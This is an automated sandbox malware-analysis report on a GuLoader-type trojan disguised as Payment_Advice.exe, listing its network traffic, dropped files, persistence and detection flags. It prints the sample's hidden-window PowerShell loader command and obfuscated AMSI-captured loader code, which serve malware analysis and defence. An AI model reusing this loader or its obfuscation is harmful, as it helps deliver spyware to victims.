Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D1

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment_Advice.exe
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_00403358
Creates driver files
Source: C:\Users\user\Desktop\Payment_Advice.exe File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00404B0E 0_2_00404B0E
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040653D 0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E5EAD8 2_2_04E5EAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E5F3A8 2_2_04E5F3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E5E790 2_2_04E5E790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0799C4D6 2_2_0799C4D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B5362 5_2_028B5362
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BA088 5_2_028BA088
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BC146 5_2_028BC146
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BC738 5_2_028BC738
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BC468 5_2_028BC468
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BD599 5_2_028BD599
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BCA08 5_2_028BCA08
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BF804 5_2_028BF804
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BCFAB 5_2_028BCFAB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B6FC8 5_2_028B6FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BCCD8 5_2_028BCCD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BEC18 5_2_028BEC18
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B39EE 5_2_028B39EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B29EC 5_2_028B29EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B3E09 5_2_028B3E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BEC0B 5_2_028BEC0B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028BFC50 5_2_028BFC50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_05BD2660 5_2_05BD2660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_05BD55E0 5_2_05BD55E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_05BDBF40 5_2_05BDBF40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_05BD39BC 5_2_05BD39BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24492970 5_2_24492970
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24492288 5_2_24492288
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24495290 5_2_24495290
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24491BA8 5_2_24491BA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_244997B0 5_2_244997B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24490040 5_2_24490040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E068 5_2_2449E068
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E067 5_2_2449E067
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449DC01 5_2_2449DC01
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449DC10 5_2_2449DC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449003F 5_2_2449003F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E4C0 5_2_2449E4C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E4BF 5_2_2449E4BF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24492963 5_2_24492963
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449ED70 5_2_2449ED70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E918 5_2_2449E918
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449E917 5_2_2449E917
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449F1C8 5_2_2449F1C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24498DF9 5_2_24498DF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24499590 5_2_24499590
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449F1B9 5_2_2449F1B9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24499E46 5_2_24499E46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449FA78 5_2_2449FA78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24492278 5_2_24492278
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24498E08 5_2_24498E08
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449F620 5_2_2449F620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24499ED8 5_2_24499ED8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24495283 5_2_24495283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449D360 5_2_2449D360
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449CF08 5_2_2449CF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24490B28 5_2_24490B28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24490B30 5_2_24490B30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_24491B97 5_2_24491B97
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_2449D7B8 5_2_2449D7B8
PE / OLE file has an invalid certificate
Source: Payment_Advice.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: Payment_Advice.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045C8
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Users\user\Desktop\Payment_Advice.exe File created: C:\Users\user\AppData\Local\Temp\nspC30D.tmp Jump to behavior
Source: Payment_Advice.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\Payment_Advice.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Payment_Advice.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\Payment_Advice.exe File read: C:\Users\user\Desktop\Payment_Advice.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
Source: C:\Users\user\Desktop\Payment_Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\Payment_Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) " Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Diodens $Fejlnormerne $Kontrolliniens), (Furfurylidene @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Affrayed = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Powerboats)), $Taphvirvler).DefineDynamicModule($Kild, $false).DefineType($Ratakslerne, $Punktnedslagenes147, [System.MulticastDelegat
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Payment_Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
Source: C:\Users\user\Desktop\Payment_Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) " Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E5E61C pushfd ; ret 2_2_04E5E625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04E5E002 pushfd ; ret 2_2_04E5E021
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0799F63A push edx; iretd 2_2_0799F63B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07999285 pushad ; ret 2_2_07999291
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 5_2_028B9C30 push esp; retf 2165h 5_2_028B9D55

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\Payment_Advice.exe File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe Jump to dropped file

Boot Survival
barindex
Powershell creates an autostart link
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnKostaldg Interne,cheirer gulvhjnconcu.ieEpiphytsAscarid/Heroise`$F,erledD SanktbiSubcortsRhes,amk Strik,eGraverir Lbin.tyStdlist]Kle use Tripaln=Tripped SurfendPOpbr,dsiVold,gts Ha.chjsAaledeao Mosegri Buddi,rCa makieKa.danerWarpat, Ddgodbi`$NeutersVOrganisiUn,ssemctelefontVisceraoFl,ngeirLoebetiiAsela,aaHeredolnSocioloe skyl or,raperen Bro.ateavancemsfirling[ Movere`$Timote.IMankoermPiositim Skatt uma cosinB ugerfiSkrmtrosBufagineFladbrnrhydroxyi Fals,nnfournitgAbitureeEeryraar ,anikinSh.oudyeKmpernesPrgtigs/ Tyves `$BoffinsDFredniniCurdlessBesaavakSkovflaeMinnikarImplemeyVaun.mu] lvekil Undeci 2reproba3Raspier9skrksla;Bouleva slosh. Ganoce, Lille,r U.opulr}SynsperProcent`$ ProphlR BullgitUdsletteaarvaagg AculearpolysponLockupvn.andfane klargr=book,es[DallyinS VoldtgtPulterkr pe sdyiLlebrdenUnsolargPapirsp] pansun[Upge.teS OriginyNonherosBrmmeswt Frowsie C,owdimJaevntv. van vrTRedistre Dingiex.eromyrtTeleka.. S abioE projeknMa euvecIliocoso C,rpaidChondr.iFor.angnZi.zagggWhistle]Haemato: Udeneu:KyaniseATilfredS LeadenC fo,sytI,alleriITachjen.SissismGSt afare Gennemt,sonnerSTrottoitIntegrarA.bestoiQurshesnInjur eg Refect( Cataph`$Jurat,dVC,rkingiNa,rendcDatablatLselystoBuckto,rNoctambiDemissiaU,enadlnChiquite arbonirLsrepannKastrate Bek,ftsCesuras)Metapho; ForpasSir.pshiHankns,fPurchas Samurai(Toastbr`$adjunkdI BrdrismErvhystmTand.tauDriftsrnAughtvii Metaphs Momsude ybriderMel nosiOutttorn Catskig r gioneMalerejr Piret,nTermchaeRefus.rsOri,atinDisloyadSvineavhInvers.oBrudstylLoyaltydalbuminsIngaevorSprrersi Maksimg Ma.betttribut )Salvage encrot{Overl,s Upshi tStolthe.Sy.temk(Pendent`$KadettePFetaer,aRetsaktufligedesForgnges Tjlen iSnde.jydTetrahyaforraade ounter)Katego. Fli tin`$ N nspeRInf,atitImbecileRearrayg Cele,erRobotizn .ahognntriorche Unorga;ThermobRegines}Acroti eSemi ralBootablsFlgesygeUd,rads G.vandt{Led,lse;Alkohol.horidg`$AftaletR.oderaatCachaloepersonngPassivdrTroklednNe paganHos.eaneStands ;snitvrk Ledida}Udsv.dn}Cyanfor`$ AnretnTh,vedstaHomatomparealerhSur.ulevMarliesiIndvlgerCitolervTusindklFortyndecopycutr Uopkla=Part tiHGuiltskiBilbrangHold pshf,emtidl Bodyguoirrad aw Trades Ant.me'TronfoeBliteratDSheiker9CrocodyABromdec8Enhorro1.ermies'Pacific;Dioxal.`$Imp.rceH I.tstyePerip.plUrbsvriaHarmonifPrunelltPahlavieSta ensn Buskons Neolibf Assobri cellevlJenvippm Encolo=V 